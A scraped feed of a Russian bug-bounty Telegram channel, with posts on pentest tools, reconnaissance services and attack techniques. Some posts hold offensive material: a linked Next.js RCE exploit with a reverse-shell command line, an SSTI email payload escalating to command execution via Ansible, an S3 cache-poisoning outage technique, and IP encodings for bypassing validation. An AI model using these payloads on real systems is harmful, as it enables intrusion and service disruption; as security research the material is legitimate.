🕷 BugBountyRu
2.74K subscribers
220 photos
22 videos
1 file
248 links
info@bugbounty.ru
Download Telegram
🕷 HTTP Repeater в стиле Burp для Chrome DevTools, еще и с поддержкой LLM (ну а куда сейчас без нее?)

Инструмент превращает Chrome DevTools в легковесный аналог Burp Repeater. Можно перехватывать, изменять и повторять любые HTTP(S)-запросы без прокси и сертификатов.

💡 Что умеет

▪️Перехват и редактирование запросов: метод, заголовки, тело
▪️Работа со всеми вкладками — запросы помечаются значками
▪️Фильтрация и поиск по URL/headers/body, поддержка регулярок
▪️Быстрые кодировки: base64, URL, JWT decode, hex/UTF-8
▪️История изменений, undo/redo, закрепление нужных запросов
▪️Экспорт и импорт запросов в JSON
▪️Bulk-атаки: Sniper / Pitchfork / Cluster Bomb с подсветкой diff
▪️JS-экстрактор: вытаскивает скрытые эндпоинты, методы, GraphQL, секреты
▪️Claude AI-ассистент: объяснение запроса, генерация векторов атаки

🥷🏿 Зачем нужен

Мгновенные проверки API без Burp
Быстрый перебор параметров и отличие ответов
Удобный формат для командной работы и репликации запросов
Обнаружение скрытых поверхностей атаки из JS и многое другое
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12
Forwarded from Cybred
Рабочий эксплоит

Спустя сутки после тряски с нейрослопом, его, наконец, написали https://github.com/Spritualkb/CVE-2025-55182-exp (сырой запрос можно найти тут). Работает на любом уязвимом приложении из коробки, я уже проверил сам.

Получить шелл в одну команду можно так
python3 exp.py http://127.0.0.1:3000 --revshell 127.0.0.1 1234

Предварительно надо не забыть поднять слушатель (не смотря на надпись, сам скрипт этого не делает).

Сейчас в интернете находится 8.7 миллионов потенциально уязвимых инстансов, — 69% всех облачных сред используют Next.js — это каждый второй прод в облаке.

Чтобы не проверять их все вручную, для Burp написали готовое расширение, которое проверяет уязвимость в фоне https://github.com/tobiasGuta/Next.js-RSC-RCE-Scanner-Burp-Suite-Extension (в active scan++ тоже добавили)
👍7
🕷 GMSGadget: простой способ обойти средства защиты от XSS

GMSGadget (Give Me a Script Gadget) — не список эксплойтов, а библиотека скриптовых гаджетов — небольших фрагментов JavaScript, которые можно использовать для обхода HTML-санитайзеров и CSP.

Проект продолжает идею исследователей из доклада на Black Hat USA 2017 под названием "Breaking XSS Mitigations via Script Gadgets".

💡 Зачем нужен

Многие кейсы защиты от XSS — CSP, DOMPurify, кастомные фильтры — опираются на строгие правила обработки HTML и JavaScript. Но у самого языка есть «особенности поведения», которые можно превратить в рабочие цепочки для инъекции.

GMSGadget собирает такие гаджеты в одном месте, чтобы тебе не приходилось искать их по блогам, багрепортам и конференциям. Все гаджеты — либо уже исправленные кейсы, либо особенности JavaScript, которые можно использовать для обхода ограничений.

🔍 Что внутри

Сервис предоставляет фильтрацию по различным параметрам, что позволяет быстро подобрать технику под конкретный кейс обхода:

браузеру,
тегам,
HTML-атрибутам,
условиям CSP,
timing-вектору.

В каждой странице гаджета:

затронутые версии браузеров,
краткое описание,
причину появления гаджета,
полезные ссылки.

🔥 Почему это полезно

упрощает поиск нестандартных XSS-векторов;
помогает обходить слишком строгие санитайзеры;
даёт готовые идеи для цепочек, когда обычные пэйлоады не проходят.
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7
Forwarded from AD_POHEQUE
МЕТОДОЛОГИЯ MCPwn'а

знаешь, какие сервисы крутятся рядом с llm?
уверен, что ни один из них не отдаёт тебе внутреннюю сеть по json-rpc / http без аутентификации?

mcp уже в проде: ide, ассистенты, консольные инструменты. для нас это не «новый хайп», а ещё один класс открытых api, где вместо /api/v1 теперь /mcp.
и да — SSRF, LFI, IDOR и COMMAND INJECTION теперь кайфуют там.

я собрал вводный разбор по атакам на mcp-серверы:
— что это за протокол;
— как искать открытые mcp-endpoint’ы;
— чем полезны damn vulnerable mcp server + mcp-scanner;
— какие векторы уже видно сейчас и как их тестировать в рамках пентеста.

если ты пентестер / оператор red team / appsec инженер и ещё не держишь mcp в модели угроз — ты пропускаешь новую поверхность атаки. через год это будет такой же must-have, как когда-то было «научиться ковырять graphql».

читай и применяй в проектах:
https://teletype.in/@ad_poheque/pentesting_mcp_servers

#Pentest #RedTeam #MLSecOps

👾
🕷 ffufai научился генерировать контекстно-зависимые словари

Вместо того, чтобы просто предлагать расширения, ffufai может анализировать целевое веб-приложение и создавать кастомные словари для фаззинга.

Параметры:

--wordlists — для включения фичи
--max-wordlist-size — для управления размером
--include-response — для включения содержимого страницы и получения еще более разумных предложений


Под капотом скрипт просто делает запрос к OpenAI или Anthropic API, но задумка интересная, согласитесь 🤑
Please open Telegram to view this post
VIEW IN TELEGRAM
👎8👍4
This media is not supported in your browser
VIEW IN TELEGRAM
Кажется в следующем году в мои финансовые расходы на "ведение бизнеса" войдет лицензия на Caido 🤑

Все больше и больше вижу решений и возможностей от комьюнити. И все меньше вижу подобного со стороны PortSwigger. Только Джеймс периодически рассказывает об очередной desync attacks схемке или об очередном обновлении Turbo Intruder.

Вот отличный пример по использованию Strix. И по мотивам этого примера даже был доклад на последнем NahamCon от Джастина Гарднера.
👍3
This media is not supported in your browser
VIEW IN TELEGRAM
🕷 Reverse CSP в действии

Content-Security-Policy — это не только механизм безопасности. Это ещё и карта внешних зависимостей приложения 🔐

CSP часто копируют между проектами и тянут из шаблонов. Если у двух сайтов одинаковая CSP-политика, велика вероятность, что это одна организация, общая инфраструктура или забытый/тестовый хост.

🧠 Суть техники Reverse CSP

Парсим CSP с целевого веб-приложения
Извлекаем домены и шаблоны
Ищем совпадения по известным CSP-политикам
Проверяем, относятся ли они к той же организации

В результате можно найти новые домены, которые не были в исходном скоупе 🚀

Для автоматизации подойдет любой парсер CSP. Например, csprecon ускоряет:

▪️ Сбор доменов из CSP
▪️ Фильтрацию по целевому домену
▪️ Поиск совпадений (домены с аналогичной конфигурацией)
▪️ Интеграцию с другими инструментами разведки вроде httpx
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7
🕷 Неожиданная цепочка атаки с использованием Server-side template injection

При тестировании форм регистрации имеет смысл проверять поле email на SSTI, например:

attacker+{{payload}}@gmail.com


Вполне возможный кейс у какого-нибудь хостинг-провайдера: приложение позволяет поднимать собственные инстансы CMS, в результате чего 👇

1️⃣ Создается пользователь
2️⃣ Разворачивается инфраструктура
3️⃣ Предоставлялся доступ к phpMyAdmin

После проверки БД через phpMyAdmin ты выясняешь, что email пользователя сохраняется как attacker+49@gmail.com. И тут понеслась:

✔️ Подтверждаем, что шаблон вычисляется сервером, а не просто сохраняется

✔️ Выясняем, что приложение использует Ansible для автоматического развёртывания инстансов, и пользовательские данные попадают в Ansible-конфигурации

✔️ В итоге получаем утечку Ansible конфига, извлекаем Ansible переменные

Для повышения импакта используем особенность Ansible: модуль lookup поддерживает тип pipe, который позволяет выполнять системные команды.

P. S. SSTI может жить не в шаблоне веб-приложения, а глубоко в инфраструктуре. Инъекции в конфигурационные файлы = высокий импакт.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍14
🕷 Работа с JavaScript в современных веб-приложениях

Работа с JavaScript на разных целевых платформах иногда может быть сложным процессом из-за упакованного JS-кода, минификации и сложности чтения.

👉 Deobfuscating / Unminifying Obfuscated Web App / JavaScript Code — огромный список ресурсов, инструментов и советов по деобфускации и распаковке любого JavaScript-кода, с которым ты можешь столкнуться.

Маст-хэв при тестировании приложения методом черного ящика 🧰
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4
🕷 Пополняем коллекцию онлайн-сервисов для разведки

🔍 ip.thc.org — крупнейшая в мире бесплатная база данных, которая включает коллекцию IP-адресов, адресов CNAME и поддоменов.

Обновляется ежемесячно, есть API с примерами для разных языков.

➡️ Reverse DNS Lookup
curl https://ip.thc.org/1.1.1.1?l=10


➡️ Subdomain Lookup
curl https://ip.thc.org/segfault.net


➡️ CNAME Lookup
curl https://ip.thc.org/cn/phrack.org


🔍 web-check — полезный сервис для пассивной разведки — позволяет посмотреть практически все о целевом ресурсе:

▪️детали IP,
▪️SSL,
▪️DNS-записи,
▪️Cookie,
▪️информацию о домене,
▪️правила для краулеров,
▪️местоположение сервера,
▪️историю редиректов,
▪️открытые порты,
▪️traceroute,
▪️DNSSEC,
▪️производительность сайта,
▪️связанные хостнеймы и многое другое.
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7
🕷 Топ-10 техник взлома веб-приложений в 2025 году

В начале января PortSwigger запустил ежегодное голосование за лучшие техники веб-взлома. Проекту уже 19 лет — его начали Jeremiah Grossman и Matt Johansen ещё в 2006-м, а с 2017 года эстафету подхватил PortSwigger.

Суть: сообщество собирает исследования, которые не просто описывают одну уязвимость, а дают переиспользуемые техники. Log4Shell забудут, а JNDI Injection останется.

📆 В этом году номинировано 60+ исследований:

🟠 Request Smuggling нового поколения — HTTP/1.1 must die от James Kettle и Funky chunks с новыми EXT.TERM примитивами

🟠 OAuth/SAML атаки — The Fragile Lock (SAML bypass через void canonicalization), обходы PKCE и BFF

🟠 XSS-эволюция — DOM clobbering + DOMPurify bypass, toString gadget chains, Self-XSS через credentialless iframes

🟠 Эксфильтрация без JS — CSS ligatures (Fontleak), SVG-фильтры для чтения пикселей cross-origin

🟠 AI в атаках — prompt injection в GitHub Actions для supply chain

Таймлайн:
➡️ До 22 января — голосование
➡️ ~3 февраля — публикация топ-10
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7
This media is not supported in your browser
VIEW IN TELEGRAM
🕷 jxscout: анализ JavaScript для багхантеров

Инструмент для автоматизации рутины при анализе JS-кода веб-приложений. Работает в связке с Burp Suite или Caido.

Что делает:

▪️Автоматически ловит и сохраняет HTML/JS-ассеты, когда трафик идёт через прокси
▪️Собирает и организует файлы по проектам в удобную структуру
▪️Находит Webpack/Vite чанки и предзагружает их
▪️Оформляет код и анализирует AST для поиска интересной логики
▪️Реверсит source maps в исходники при наличии файлов .map

Расширение VSCode выступает в качестве интерфейса для jxscout и визуализирует результаты анализа AST в виде дерева.

Платная версия добавляет:

Улучшенное обнаружение чанков и реверс source map
Оптимизатор кода, который раскрывает больше API-путей
Расширенные возможности VSCode/AI-интеграции
И другие фичи, которые пока не вернулись в опенсорс

В итоге jxscout — удобный помощник для багхантера, позволяющий получать готовые файлы/структуры для обхода и анализа.

Если ты не можешь справиться с бесконечным количеством минифицированных скриптов, source maps и пропущенными чанками — этот инструмент может серьезно ускорить работу.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7
This media is not supported in your browser
VIEW IN TELEGRAM
🕷 Команда Caido выпустила официальное браузерное расширение

Caido Extension автоматически определяет прокси и маршрутизирует трафик из браузера прямо в инстанс Caido — без ручной настройки. Скачай для Firefox или Chrome 🌐

⚙️ За последнее время появились и другие полезные расширения:

▪️ SLCyber Tools — SSRF-сканер по словарю от SLCyber
▪️ Sequencer — анализ качества случайности и предсказуемости токенов безопасности
▪️ RetireJS Scanner — поиск устаревших JavaScript-библиотек с известными уязвимостями
▪️ Hex — просмотр и редактирование данных в hex-формате
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4
This media is not supported in your browser
VIEW IN TELEGRAM
🕷 LinkFinder на максималках

Продолжаешь поиск эндпоинтов и скрытых параметров в веб-приложениях вручную? xnLinkFinder сделает за тебя эту работу 🔥

Скрипт выполняет поиск целевых объектов, извлекает ссылки, обнаруживает секреты и создает словари для конкретных целей. Все это из файлов Burp/Caido/ZAP, HAR-файлов (HTTP архив) или URL-адресов.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4
Forwarded from InfoSec VK Hub
Сезон VK Security Confab 2026 объявляем открытым! И первая встреча — Bug Bounty Edition.

Когда: 19 марта
Где: Москва, БЦ SkyLight

Есть крутой кейс, полезный лайфхак или история, которыми стоит поделиться с коммьюнити? Приходите выступать! Ждем ваши заявки до 26 февраля.

🔹Хочу выступить!

VK Security | Буст этому каналу

#confab #митап #bugbounty
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2👎1
Forwarded from BlackFan
Интересная уязвимость, связанная с кэшированием HTTP ответов из S3, может возникнуть если немного перестараться с настройкой.

Условия:
1) Сайт хранит статику в S3 и по определенным условиям проксирует туда запросы, либо имеет отдельный поддомен, который проксирует запросы на S3 бакет
2) Чтобы не гонять 10 мегабайтные JavaScript файлы, кэшируется контент из S3 для любого HTTP ответа с кодом 200
3) Так как кэшируется только статика - не включаем в ключ кэша cookie или query-параметры

Казалось бы, все в порядке, но проблема заключается в том, что S3 умеет отвечать с кодом 200 не только возвращая контент файла, но еще и при получении другой информации об объекте.
Например, для получения списка тегов достаточно в query-параметры добавить ?tagging, что часто разрешают для неавторизованных запросов.

https://site.tld/static/somefile.js?tagging


В результате, вместо контента файла вернется следующий HTTP ответ:
<?xml version="1.0" encoding="UTF-8"?>
<Tagging xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
<TagSet></TagSet>
</Tagging>


И если так запросить статику на сайте в момент, когда кэш HTTP ответа будет обновляться - это приведет к тому, что всем следующим пользователям вместо JS вернется некорректный ответ и сайт станет недоступен на время жизни зараженного кэша.

Если ?tagging, ?acl и подобные методы возвращают 403, можно попробовать параметры из GetObject API и, например, закэшировать некорректный Content-Type, указав в запросе ?response-content-type=text/html. Это приведет к тому, что браузер откажется выполнять JavaScript с некорректным типом, что также приведет к нарушению работы сайта (это поведение еще зависит от наличия в ответе заголовка X-Content-Type-Options: nosniff).

Как проверить уязвимость и не аффектить реальных пользователей:
1) Находим через архивы устаревшие JS на сайте
2) Так как к ним никто не обращается, следующий запрос будет с обновлением кэша, поэтому сразу запрашиваем с ?tagging или ?response-content-type=text/html
3) Проверяем, что зараженный HTTP ответ возвращается без указания query-параметров
3) Проверяем, что кэш не привязан к текущему пользователю запросив с другого устройства / IP / от имени другого пользователя

Как исправить уязвимость:
1) Убрать из проксируемого HTTP запроса query-параметры при передаче на S3
2) Добавить query-параметры в ключ кэша
👍1
🕷 Сломай валидацию: 10 рабочих способов

▪️8.8.1028 → Объединяет 3-й и 4-й октеты: 4 × 256 + 4 = 1028

▪️8.525316 → Объединяет последние три октета в одно десятичное число

▪️0x08.8.004.004 → Шестнадцатеричный + десятичный + восьмеричный (сегмент за сегментом)

▪️0x08.0x08.004.004 → Два сегмента в hex, два в восьмеричном

▪️0x08.010.4.4 → Смешанный hex + восьмеричный + десятичный

▪️134743044 → Полное 32-битное целое представление IP-адреса

▪️0x08080404 → Весь IP закодирован как одно hex-число

▪️010.010.004.004 → Каждый сегмент с ведущим нулём, чтобы форсировать восьмеричную интерпретацию

▪️0x8.0x8.0x4.0x4 → Все четыре октета закодированы индивидуально в шестнадцатеричном виде

▪️8.8.0x404 → Последний сегмент в hex: 0x404 = 1028

✍️ Также можно использовать юникод-цифры вместо обычных. Эти варианты обычно не работают с curl/ping, но могут срабатывать в других библиотеках/языках: ⑧.⑧.④.④, 𝟠.𝟠.𝟜.𝟜.

Автоматизируй работу по байбасу валидации с помощью ipfuscator — простого Go-инструмента для быстрой генерации альтернативных представлений IP-адресов (v4)
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8